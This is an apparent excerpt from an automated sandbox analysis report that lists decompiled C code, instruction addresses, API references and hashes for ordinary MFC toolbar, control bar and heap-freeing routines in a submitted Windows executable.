														if( *_t365 != _t338) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L134;
										}
										_t259 = 0;
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t445;
						if(_t445 == 0) {
							_t259 =  *(_t429 + (_t259 + 2 + _t259 + 2) * 8);
						} else {
							_push(_t445);
							_push(_t259);
							_push(_t429);
							L83();
						}
						L80:
						_pop(_t430);
						_pop(_t446);
						__eflags = _v12 ^ _t461;
						_pop(_t366);
						return E00DDCBCE(_t259, _t366, _v12 ^ _t461, _t424, _t430, _t446);
					}
				}
				L134:
			}

0x00df2eb3
0x00df2ebb
0x00df2ebc
0x00df2ec5
0x00df2ecd
0x00df2ecf
0x00df2ed1
0x00df2ed4
0x00df2ff1
0x00df2ff4
0x00df2eda
0x00df2eda
0x00df2edb
0x00df2edd
0x00df2edd
0x00df2ee0
0x00df2ee3
0x00df2ee6
0x00df2ee9
0x00df2eeb
0x00df2eee
0x00df2ef3
0x00df2f01
0x00df2f0b
0x00df2f0e
0x00df2f11
0x00df2f11
0x00df2f1c
0x00df2f21
0x00df2f26
0x00000000
0x00df2f2c
0x00df2f2f
0x00df2f2f
0x00df2f32
0x00df2f34
0x00df2f37
0x00df2f39
0x00df2f39
0x00df2f39
0x00df2f3c
0x00df2f3c
0x00df2f3c
0x00df2f42
0x00000000
0x00000000
0x00df2f47
0x00df2f5e
0x00df2f5e
0x00df2f49
0x00df2f49
0x00df2f51
0x00000000
0x00df2f53
0x00df2f53
0x00df2f56
0x00df2f5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00df2f5c
0x00df2f51
0x00df2f67
0x00df2f67
0x00df2f6c
0x00df2f71
0x00df2f75
0x00df2f81
0x00df2f84
0x00df2f87
0x00df2f91
0x00df2f99
0x00df2fa1
0x00000000
0x00df2fa7
0x00df2fab
0x00df2ff6
0x00df2fff
0x00df3002
0x00df3004
0x00df3008
0x00df300c
0x00df3011
0x00df3016
0x00df300c
0x00df301a
0x00df301c
0x00df301e
0x00df3022
0x00df3023
0x00df3028
0x00df302d
0x00df3023
0x00df3030
0x00df3033
0x00df3036
0x00df3039
0x00df303c
0x00df2fad
0x00df2fb0
0x00df2fb3
0x00df2fb5
0x00df2fb9
0x00df2fbd
0x00df2fc2
0x00df2fc7
0x00df2fbd
0x00df2fcd
0x00df2fcf
0x00df2fd4
0x00df2fd9
0x00df2fde
0x00df2fd4
0x00df2fdf
0x00df2fe3
0x00df2fe3
0x00df2fe6
0x00df2fea
0x00df2fed
0x00df2fed
0x00000000
0x00df2ff0
0x00000000
0x00df2fa1
0x00df2f62
0x00df2f64
0x00df2f64
0x00000000
0x00df2f64
0x00df3043
0x00df3044
0x00df3045
0x00df3046
0x00df3047
0x00df3048
0x00df304d
0x00df3051
0x00df3053
0x00df3059
0x00df3060
0x00df3063
0x00df3066
0x00df3067
0x00df3068
0x00df306b
0x00df306c
0x00df306f
0x00df3075
0x00df3077
0x00df309c
0x00df30a6
0x00df30ac
0x00df30ae
0x00df30b4
0x00df30b6
0x00df3316
0x00df3317
0x00000000
0x00df30bc
0x00df30bc
0x00df30c0
0x00df322e
0x00df324b
0x00df3250
0x00df3253
0x00df3255
0x00df325b
0x00df325b
0x00df325d
0x00df3260
0x00df3262
0x00df3268
0x00df3268
0x00df326a
0x00df32f1
0x00df32f1
0x00df3270
0x00df3270
0x00df3272
0x00df3278
0x00df327b
0x00df327e
0x00df3284
0x00000000
0x00000000
0x00df3286
0x00df328a
0x00df32b3
0x00df32b3
0x00df32b5
0x00df328c
0x00df328c
0x00df3290
0x00df3294
0x00df329b
0x00df32a1
0x00000000
0x00df32a3
0x00df32a3
0x00df32a6
0x00df32a9
0x00df32b1
0x00000000
0x00000000
0x00000000
0x00000000
0x00df32b1
0x00df32a1
0x00df32c0
0x00df32c0
0x00df32c2
0x00df32f0
0x00df32f0
0x00000000
0x00df32c4
0x00df32c4
0x00df32ca
0x00df32cb
0x00df32cc
0x00df32cd
0x00df32d2
0x00df32d8
0x00df32db
0x00df32dd
0x00df32e4
0x00df32e6
0x00df32e8
0x00df32df
0x00df32df
0x00df32e0
0x00000000
0x00df32e0
0x00df32dd
0x00000000
0x00df32c2
0x00df32b9
0x00df32bb
0x00df32be
0x00df32be
0x00000000
0x00df32be
0x00df32f7
0x00df32f7
0x00df32f8
0x00df32fb
0x00df3301
0x00df3301
0x00df330a
0x00df330c
0x00000000
0x00df330e
0x00df330e
0x00df3310
0x00000000
0x00df3312
0x00df3312
0x00df3312
0x00df3310
0x00df330c
0x00000000
0x00df30c6
0x00df30c6
0x00df30cb
0x00000000
0x00df30d1
0x00df30d1
0x00df30d6
0x00000000
0x00df30dc
0x00df30dc
0x00df30e2
0x00df30e7
0x00df30e9
0x00df30f0
0x00df30f1
0x00df30f3
0x00000000
0x00000000
0x00df30f9
0x00df30f9
0x00df30fd
0x00df3103
0x00000000
0x00df3109
0x00df310b
0x00df310c
0x00df310f
0x00000000
0x00df3115
0x00df3115
0x00df311b
0x00df3120
0x00df312a
0x00df312e
0x00df3133
0x00df3136
0x00df3138
0x00000000
0x00df313a
0x00df313a
0x00df313c
0x00df313f
0x00df313f
0x00df3142
0x00df3145
0x00df3145
0x00df3150
0x00df3152
0x00df3154
0x00000000
0x00000000
0x00df3154
0x00000000
0x00df3156
0x00df3156
0x00df315c
0x00df315f
0x00df315f
0x00df316d
0x00df3176
0x00df317b
0x00df3181
0x00df3184
0x00df3185
0x00df3187
0x00df3195
0x00df3195
0x00df319c
0x00df31fd
0x00000000
0x00df319e
0x00df319e
0x00df31ac
0x00df31b1
0x00df31b4
0x00df31b6
0x00df3331
0x00df3333
0x00df3334
0x00df3335
0x00df3336
0x00df3337
0x00df3338
0x00df333d
0x00df3340
0x00df3341
0x00df3349
0x00df3350
0x00df3353
0x00df3354
0x00df3357
0x00df335b
0x00df335c
0x00df335f
0x00df336f
0x00df3392
0x00df3397
0x00df339a
0x00df339c
0x00df3652
0x00df3652
0x00df3652
0x00000000
0x00df33a2
0x00df33a2
0x00df33a5
0x00df33a5
0x00df33a8
0x00df33ae
0x00df33b4
0x00df33b7
0x00df33b9
0x00df33bc
0x00df33c3
0x00df33c6
0x00df33cc
0x00000000
0x00000000
0x00df33ce
0x00df33d2
0x00df33fb
0x00df33fb
0x00df33d4
0x00df33d4
0x00df33d8
0x00df33dc
0x00df33e3
0x00df33e9
0x00000000
0x00df33eb
0x00df33eb
0x00df33ee
0x00df33f1
0x00df33f9
0x00000000
0x00000000
0x00000000
0x00000000
0x00df33f9
0x00df33e9
0x00df3408
0x00df3408
0x00df340a
0x00df3413
0x00df3419
0x00df341c
0x00df341c
0x00df341f
0x00df3422
0x00df3422
0x00df3432
0x00df3440
0x00df3445
0x00df344c
0x00df344e
0x00000000
0x00df3454
0x00df345a
0x00df3467
0x00df3470
0x00df3476
0x00df3483
0x00df348a
0x00df348f
0x00df3492
0x00df3494
0x00df36d2
0x00df36d8
0x00df36d9
0x00df36da
0x00df36db
0x00df36dc
0x00df36dd
0x00df36e2
0x00df36e5
0x00df36e8
0x00df36e9
0x00df36fb
0x00df3700
0x00df3702
0x00df370b
0x00000000
0x00df370b
0x00df3704
0x00df3707
0x00df3709
0x00000000
0x00000000
0x00df3711
0x00df349a
0x00df349a
0x00df34a8
0x00df34ab
0x00df34c1
0x00df34c8
0x00df34cd
0x00df34ad
0x00df34ad
0x00df34b5
0x00000000
0x00df34b7
0x00df34b7
0x00df34bd
0x00df34bd
0x00df34b5
0x00df34d4
0x00df34db
0x00df34de
0x00df35dc
0x00df35df
0x00df35ec
0x00df35ef
0x00df35f7
0x00df35f7
0x00df35e1
0x00df35e7
0x00df35e7
0x00df34e4
0x00df34e4
0x00df34f0
0x00df34f6
0x00df34fc
0x00df34ff
0x00df3505
0x00df3508
0x00df350b
0x00000000
0x00000000
0x00df350d
0x00df3516
0x00df351a
0x00df3523
0x00df3527
0x00df3528
0x00df352e
0x00df3534
0x00df353a
0x00df353d
0x00000000
0x00000000
0x00df353f
0x00df355e
0x00df355e
0x00df3561
0x00df357e
0x00df3583
0x00df3586
0x00df3588
0x00df35c6
0x00df358a
0x00df358a
0x00df3590
0x00df3595
0x00df359d
0x00df359e
0x00df359e
0x00df35b5
0x00df35bc
0x00df35bf
0x00df35c1
0x00df35c1
0x00df35cc
0x00df35d2
0x00df35d2
0x00df35d7
0x00000000
0x00df35d7
0x00df3541
0x00df3543
0x00df3548
0x00df354e
0x00df3557
0x00df355a
0x00df355a
0x00000000
0x00df3543
0x00df35fa
0x00df35fa
0x00df35fe
0x00df3606
0x00df360c
0x00df360f
0x00df3615
0x00df3617
0x00df3663
0x00df3669
0x00df36b5
0x00df36b5
0x00df366b
0x00df3670
0x00df3670
0x00df3676
0x00df367a
0x00000000
0x00df367c
0x00df3680
0x00df3689
0x00df3695
0x00df369a
0x00df36a3
0x00df36a9
0x00df36ac
0x00df36ac
0x00df367a
0x00df36bb
0x00df36c3
0x00df36c9
0x00df36cc
0x00df3619
0x00df361f
0x00df3629
0x00df363b
0x00df3642
0x00df364f
0x00000000
0x00df364f
0x00000000
0x00df3617
0x00df3494
0x00df340c
0x00df340c
0x00df3654
0x00df3657
0x00df3658
0x00df3659
0x00df365b
0x00df3662
0x00df3662
0x00000000
0x00df340a
0x00df3403
0x00df3405
0x00df3405
0x00000000
0x00df3405
0x00df31bc
0x00df31bc
0x00df31bf
0x00df31c4
0x00df332c
0x00000000
0x00df31ca
0x00df31cc
0x00df31d4
0x00df31da
0x00df31db
0x00df31e1
0x00df31e2
0x00df31e7
0x00df31ed
0x00df31f0
0x00df31f2
0x00df31f4
0x00df31f5
0x00df31f5
0x00df3203
0x00df3203
0x00df3206
0x00df3209
0x00df320b
0x00df320e
0x00df3210
0x00df3210
0x00df3213
0x00df3213
0x00df3216
0x00df3219
0x00000000
0x00df321f
0x00df321f
0x00df3221
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00df3221
0x00df3219
0x00df31c4
0x00df31b6
0x00df3189
0x00df318b
0x00df318c
0x00df318f
0x00000000
0x00000000
0x00000000
0x00000000
0x00df318f
0x00df3187
0x00df310f
0x00000000
0x00df3103
0x00df3227
0x00000000
0x00df3227
0x00df30d6
0x00df30cb
0x00df30c0
0x00df3079
0x00df3079
0x00df307b
0x00df3092
0x00df307d
0x00df307d
0x00df307e
0x00df307f
0x00df3080
0x00df3085
0x00df331d
0x00df3320
0x00df3321
0x00df3322
0x00df3324
0x00df332b
0x00df332b
0x00df3077
0x00000000

APIs

Part of subcall function 00DF598E: RtlAllocateHeap.NTDLL(00000000,8007000E,?,?,00CA95AE,8007000E,00000000,?,?,00CA9725,8007000E,?,00CA9A96,0000000C,00000004,00CA20EA), ref: 00DF59C0

_free.LIBCMT ref: 00DF2FC2
_free.LIBCMT ref: 00DF2FD9
_free.LIBCMT ref: 00DF2FF6
_free.LIBCMT ref: 00DF3011
_free.LIBCMT ref: 00DF3028

Strings

x", xrefs: 00DF2F06
\", xrefs: 00DF2F9C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _free$AllocateHeap
String ID: \"$x"
API String ID: 3033488037-3538413811
Opcode ID: d59fc8334d8cb31b1fa48525704e2a60265a80d6748b4a71a7af66e4b7541c36
Instruction ID: b783aa4622f50538fa7847f1098e84ea4a23becbd2a96e5adcf8f931d017cb1d
Opcode Fuzzy Hash: d59fc8334d8cb31b1fa48525704e2a60265a80d6748b4a71a7af66e4b7541c36
Instruction Fuzzy Hash: 2351B231A00308AFDB21DF2ADC41A7A77F4EF55720B16865DEA45D7251E731DA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CF7743 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00CF7743(intOrPtr __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t74;
				intOrPtr _t87;
				intOrPtr* _t95;
				intOrPtr* _t99;
				int _t103;
				void* _t109;
				void* _t120;
				intOrPtr _t126;
				intOrPtr _t164;
				intOrPtr* _t166;
				void* _t173;
				void* _t178;

				_t178 = __eflags;
				_t164 = __edx;
				E00DDD595(0xe0b971, __ebx, __edi, __esi);
				_t166 = __ecx;
				 *((intOrPtr*)(_t173 - 0x34)) = __ecx;
				E00D52263(__ebx, __ecx, __esi, _t178, _t173 - 0x20, "MFCToolBars",  *((intOrPtr*)(_t173 + 8)), 0xa0);
				_t126 =  *((intOrPtr*)(_t173 + 0xc));
				 *((intOrPtr*)(_t173 - 4)) = 0;
				if(_t126 == 0xffffffff) {
					_t126 = E00CB7697(_t166);
					 *((intOrPtr*)(_t173 + 0xc)) = _t126;
				}
				E00CA67E1(_t173 - 0x18);
				_t74 =  *((intOrPtr*)(_t173 + 0x10));
				 *((char*)(_t173 - 4)) = 1;
				_t180 = _t74 - 0xffffffff;
				if(_t74 != 0xffffffff) {
					_push(_t74);
					_push(_t126);
					E00CA6953(_t173 - 0x18, "%TsMFCToolBar-%d%x",  *((intOrPtr*)(_t173 - 0x20)));
				} else {
					_push(_t126);
					E00CA6953(_t173 - 0x18, "%TsMFCToolBar-%d",  *((intOrPtr*)(_t173 - 0x20)));
				}
				 *((char*)(_t173 - 4)) = 2;
				E00D79282(_t173 - 0x64, _t180, 0x400);
				 *((char*)(_t173 - 4)) = 3;
				E00CAE222(_t126, _t173 - 0xac, _t166, 0, _t180);
				 *((char*)(_t173 - 4)) = 4;
				_t169 =  *((intOrPtr*)( *_t166 + 8));
				 *0xe17a64(_t173 - 0xac, _t173 - 0x64, 0, 0x1000, 0);
				 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 8))))();
				E00CAE920(_t173 - 0xac, _t164);
				 *((char*)(_t173 - 4)) = 3;
				E00CAE355(_t173 - 0xac, _t164);
				 *((intOrPtr*)(_t173 - 0x30)) = E00D794EC(_t173 - 0x64);
				 *((intOrPtr*)(_t173 - 0x28)) = _t164;
				_t87 = E00D79405(_t173 - 0x64);
				 *((intOrPtr*)(_t173 - 0x24)) = _t87;
				if(_t87 != 0) {
					 *((intOrPtr*)(_t173 - 0x2c)) = 0;
					 *((intOrPtr*)(_t173 - 0x28)) = 0;
					 *((char*)(_t173 - 4)) = 5;
					_t95 = E00D52432(_t173 - 0x2c, 0, 0);
					 *((intOrPtr*)(_t173 - 0x14)) = _t95;
					_t169 =  *((intOrPtr*)( *_t95 + 0xc));
					 *0xe17a64( *((intOrPtr*)(_t173 - 0x18)));
					if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0xc))))() != 0) {
						_t103 = IsWindow( *(_t166 + 0x20));
						_t183 = _t103;
						if(_t103 != 0) {
							E00CA67E1(_t173 - 0x1c);
							 *((char*)(_t173 - 4)) = 6;
							E00CB2D00(_t166, _t173 - 0x1c);
							 *0xe17a64("Name",  *((intOrPtr*)(_t173 - 0x1c)));
							_t120 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 - 0x14)))) + 0x30))))();
							 *((char*)(_t173 - 4)) = 5;
							E00CA2975(_t120,  *((intOrPtr*)(_t173 - 0x1c)) - 0x10);
						}
						 *0xe17a64("Buttons",  *((intOrPtr*)(_t173 - 0x24)),  *((intOrPtr*)(_t173 - 0x30)));
						_t169 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t173 - 0x14)))) + 0x28))))();
						_t109 = E00CACA6C(0xe25398,  *((intOrPtr*)(E00CACEEE(_t126, _t166, _t169, _t183) + 4)));
						if(_t169 != 0 && _t109 != 0 &&  *((intOrPtr*)(_t109 + 0x10c)) != 0) {
							_t169 =  *((intOrPtr*)( *_t166 + 0x428));
							 *0xe17a64( *((intOrPtr*)(_t173 - 0x14)));
							 *((intOrPtr*)( *((intOrPtr*)( *_t166 + 0x428))))();
						}
						E00CF770F(_t166,  *((intOrPtr*)(_t173 - 0x14)));
					}
					E00DE2153( *((intOrPtr*)(_t173 - 0x24)));
					_t99 =  *((intOrPtr*)(_t173 - 0x2c));
					_t187 = _t99;
					if(_t99 != 0) {
						_t169 =  *((intOrPtr*)( *_t99 + 4));
						 *0xe17a64(1);
						 *((intOrPtr*)( *((intOrPtr*)( *_t99 + 4))))();
					}
				}
				E00D79316(_t173 - 0x64);
				 *((intOrPtr*)(_t173 - 4)) = 1;
				E00CA2975(E00CA2975(E00CE5192(_t126, _t166, _t166, _t169, _t187,  *((intOrPtr*)(_t173 + 8)), _t126,  *((intOrPtr*)(_t173 + 0x10))),  *((intOrPtr*)(_t173 - 0x18)) + 0xfffffff0),  *((intOrPtr*)(_t173 - 0x20)) + 0xfffffff0);
				return E00DDD4FA(_t89);
			}

0x00cf7743
0x00cf7743
0x00cf774d
0x00cf7752
0x00cf7754
0x00cf7763
0x00cf776b
0x00cf7770
0x00cf7776
0x00cf777f
0x00cf7781
0x00cf7781
0x00cf7787
0x00cf778c
0x00cf778f
0x00cf7793
0x00cf7796
0x00cf77af
0x00cf77b0
0x00cf77bd
0x00cf7798
0x00cf7798
0x00cf77a5
0x00cf77aa
0x00cf77cd
0x00cf77d1
0x00cf77e0
0x00cf77eb
0x00cf77f2
0x00cf77f6
0x00cf7802
0x00cf780a
0x00cf7812
0x00cf781d
0x00cf7821
0x00cf7831
0x00cf7834
0x00cf7837
0x00cf783c
0x00cf7841
0x00cf7849
0x00cf784c
0x00cf7854
0x00cf7858
0x00cf7860
0x00cf7865
0x00cf786a
0x00cf7877
0x00cf7880
0x00cf7886
0x00cf7888
0x00cf788d
0x00cf7895
0x00cf789c
0x00cf78b3
0x00cf78bc
0x00cf78c1
0x00cf78c8
0x00cf78c8
0x00cf78e2
0x00cf78ed
0x00cf78fc
0x00cf7905
0x00cf7919
0x00cf7921
0x00cf7929
0x00cf7929
0x00cf7930
0x00cf7930
0x00cf7938
0x00cf793d
0x00cf7941
0x00cf7943
0x00cf7949
0x00cf794e
0x00cf7957
0x00cf7957
0x00cf7943
0x00cf795c
0x00cf797c
0x00cf799f
0x00cf79ab

APIs

__EH_prolog3_catch.LIBCMT ref: 00CF774D

Part of subcall function 00D52263: __EH_prolog3.LIBCMT ref: 00D5226A
Part of subcall function 00D52263: _strlen.LIBCMT ref: 00D522A1

IsWindow.USER32(?), ref: 00CF7880

Part of subcall function 00CB7697: GetDlgCtrlID.USER32 ref: 00CB76A2

Strings

%TsMFCToolBar-%d, xrefs: 00CF779F
MFCToolBars, xrefs: 00CF775D
%TsMFCToolBar-%d%x, xrefs: 00CF77B7
Buttons, xrefs: 00CF78D8
Name, xrefs: 00CF78A7

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CtrlH_prolog3H_prolog3_catchWindow_strlen
String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars$Name
API String ID: 873532295-190999575
Opcode ID: 0baf4b834f7d699dc80e0b1772ece38ff49706bd4e70978fb65206e7a6157dad
Instruction ID: b895ccc1b2320382be31f80f93ff8b46cef5fea4d55c5002307204f1eb0d59a6
Opcode Fuzzy Hash: 0baf4b834f7d699dc80e0b1772ece38ff49706bd4e70978fb65206e7a6157dad
Instruction Fuzzy Hash: 78718A31A0021A9FDF01EFA4C951AEEBBB5AF09314F144059E915B72A1DB309F04DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2B48 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00CE2B48(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t75;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				intOrPtr _t100;
				void* _t108;

				_t98 = __edx;
				_push(0x2c);
				E00DDD55F(0xe0abb7, __ebx, __edi, __esi);
				_t80 = __ecx;
				_t104 =  *((intOrPtr*)(_t108 + 0x18));
				_t100 =  *((intOrPtr*)(_t108 + 0xc));
				 *(_t108 - 0x34) =  *(_t108 + 0x14);
				 *((intOrPtr*)(_t108 - 0x38)) =  *((intOrPtr*)(_t108 + 0x18));
				 *((intOrPtr*)(_t108 - 0x30)) =  *((intOrPtr*)(_t108 + 0x24));
				E00CA67E1(_t108 - 0x24);
				 *((intOrPtr*)(_t108 - 0x28)) = 0;
				 *((intOrPtr*)(_t108 - 4)) = 0;
				_t110 = _t100;
				if(_t100 != 0) {
					_push(E00DEC1A0(_t100));
					E00CA2CD7(_t80, _t108 - 0x24, _t100, _t104, _t100);
				} else {
					_t75 = E00CC19ED();
					_push("Afx:ControlBar");
					_push(_t108 - 0x2c);
					_t76 = E00CD9095(_t80, _t75, __edx, _t100, _t104, _t110);
					 *((char*)(_t108 - 4)) = 1;
					_t77 = E00CA68A8(_t108 - 0x24, _t76);
					 *((char*)(_t108 - 4)) = 0;
					E00CA2975(_t77,  *((intOrPtr*)(_t108 - 0x2c)) - 0x10);
				}
				_t101 =  *(_t108 - 0x34);
				 *((intOrPtr*)(_t80 + 0x180)) =  *((intOrPtr*)(_t108 + 0x1c));
				if(E00CE0856(_t80, _t98,  *((intOrPtr*)(_t108 + 8)),  *((intOrPtr*)(_t108 - 0x24)), 0,  *(_t108 + 0x10) | 0x06000000, _t101, _t104,  *((intOrPtr*)(_t108 + 0x1c)),  *((intOrPtr*)(_t108 + 0x20)),  *((intOrPtr*)(_t108 - 0x30))) != 0) {
					CopyRect(_t108 - 0x20, _t101);
					E00CB9BF2(_t104, _t108 - 0x20);
					if(IsRectEmpty(_t80 + 0x258) != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t101 = _t80 + 0x218;
					if(IsRectEmpty(_t80 + 0x218) != 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					if(IsRectEmpty(_t108 - 0x20) == 0) {
						_t101 = _t80 + 0x1e8;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t70 =  *((intOrPtr*)(_t108 - 0x38));
					if(_t70 == 0) {
						_t71 = 0;
						__eflags = 0;
					} else {
						_t71 =  *((intOrPtr*)(_t70 + 0x20));
					}
					 *((intOrPtr*)(_t80 + 0x5c)) = _t71;
					E00CE57B6(_t80, _t98);
					_t104 =  *((intOrPtr*)( *_t80 + 0x1cc));
					 *0xe17a64();
					if(( *(_t80 + 0xa0) &  *((intOrPtr*)( *((intOrPtr*)( *_t80 + 0x1cc))))()) != 0) {
						_t58 = E00D58A3A(_t80, _t80 + 0x18c, _t98, _t101, _t104, _t80);
					}
					 *((intOrPtr*)(_t108 - 0x28)) = 1;
				}
				E00CA2975(_t58,  *((intOrPtr*)(_t108 - 0x24)) - 0x10);
				return E00DDD50E(_t80, _t101, _t104);
			}

0x00ce2b48
0x00ce2b48
0x00ce2b4f
0x00ce2b54
0x00ce2b5c
0x00ce2b5f
0x00ce2b62
0x00ce2b68
0x00ce2b6b
0x00ce2b6e
0x00ce2b75
0x00ce2b78
0x00ce2b7b
0x00ce2b7d
0x00ce2bb9
0x00ce2bbe
0x00ce2b7f
0x00ce2b7f
0x00ce2b84
0x00ce2b8c
0x00ce2b8f
0x00ce2b98
0x00ce2b9c
0x00ce2ba4
0x00ce2bab
0x00ce2bab
0x00ce2bce
0x00ce2bd3
0x00ce2bf2
0x00ce2bfd
0x00ce2c09
0x00ce2c1d
0x00ce2c22
0x00ce2c23
0x00ce2c24
0x00ce2c25
0x00ce2c25
0x00ce2c26
0x00ce2c35
0x00ce2c3a
0x00ce2c3b
0x00ce2c3c
0x00ce2c3d
0x00ce2c3d
0x00ce2c4a
0x00ce2c4c
0x00ce2c55
0x00ce2c56
0x00ce2c57
0x00ce2c58
0x00ce2c58
0x00ce2c59
0x00ce2c5e
0x00ce2c65
0x00ce2c65
0x00ce2c60
0x00ce2c60
0x00ce2c60
0x00ce2c69
0x00ce2c6c
0x00ce2c73
0x00ce2c7b
0x00ce2c8b
0x00ce2c94
0x00ce2c94
0x00ce2c99
0x00ce2c99
0x00ce2ca6
0x00ce2cb3

APIs

__EH_prolog3_GS.LIBCMT ref: 00CE2B4F
_strlen.LIBCMT ref: 00CE2BB3
CopyRect.USER32 ref: 00CE2BFD
IsRectEmpty.USER32 ref: 00CE2C15
IsRectEmpty.USER32 ref: 00CE2C2D
IsRectEmpty.USER32 ref: 00CE2C42

Part of subcall function 00CD9095: __EH_prolog3.LIBCMT ref: 00CD909C
Part of subcall function 00CD9095: LoadCursorA.USER32 ref: 00CD90C0
Part of subcall function 00CD9095: GetClassInfoA.USER32 ref: 00CD90FB

Strings

Afx:ControlBar, xrefs: 00CE2B84

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty$ClassCopyCursorH_prolog3H_prolog3_InfoLoad_strlen
String ID: Afx:ControlBar
API String ID: 2796920778-4244778371
Opcode ID: 912d9c0a950cd912a8dde779275c4e91668256b8cc372be6bb6c1e0600e27660
Instruction ID: 6bbccef6a181ceeb769b028647a6e6564339476673c7b63ebb5119fe4e47b1ff
Opcode Fuzzy Hash: 912d9c0a950cd912a8dde779275c4e91668256b8cc372be6bb6c1e0600e27660
Instruction Fuzzy Hash: E1416771A002599FDF01DFA5C884AEE77BAFF49704F140069FC06BB281DB75AA45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB03CE Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00CB03CE(void* __ebx, int __ecx, void* __edi, int _a4) {
				struct HBITMAP__* _v4;
				struct tagMENUITEMINFOA _v60;
				signed int _v84;
				void _v148;
				signed int _v152;
				int _v156;
				int _v160;
				unsigned int _v220;
				intOrPtr _v224;
				struct HBITMAP__* _v232;
				char _v252;
				intOrPtr _v256;
				void* __esi;
				void* __ebp;
				long _t76;
				struct HBITMAP__* _t77;
				int _t82;
				struct HBITMAP__* _t85;
				signed int _t87;
				unsigned int _t89;
				signed int _t93;
				struct HBITMAP__* _t96;
				struct HBITMAP__* _t97;
				signed int _t104;
				signed short _t107;
				struct HBITMAP__* _t113;
				struct HBITMAP__* _t118;
				void* _t124;
				signed int _t130;
				void* _t131;
				int _t132;
				struct HBITMAP__* _t134;
				signed int _t139;
				signed int _t141;
				unsigned int _t143;
				intOrPtr _t146;
				struct HBITMAP__* _t147;
				char* _t149;
				void* _t150;
				struct HBITMAP__* _t151;
				unsigned int _t153;
				struct HBITMAP__* _t154;
				signed int* _t156;
				void* _t158;
				int _t160;
				struct HBITMAP__* _t162;
				unsigned int _t164;
				struct HBITMAP__* _t165;
				struct HBITMAP__* _t167;
				void* _t169;
				int _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t178;
				signed int _t179;
				signed int _t180;

				_t150 = __edi;
				_t132 = __ecx;
				_t124 = __ebx;
				_t160 = __ecx;
				_t146 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t146 == 0) {
					_t77 =  *(__ecx + 0x14);
					__eflags = _t77;
					if(__eflags == 0) {
						goto L8;
					} else {
						_t76 = SendMessageA( *(_t77 + 0x20), 0x87, 0, 0);
						__eflags = _t76 & 0x00002000;
						if((_t76 & 0x00002000) != 0) {
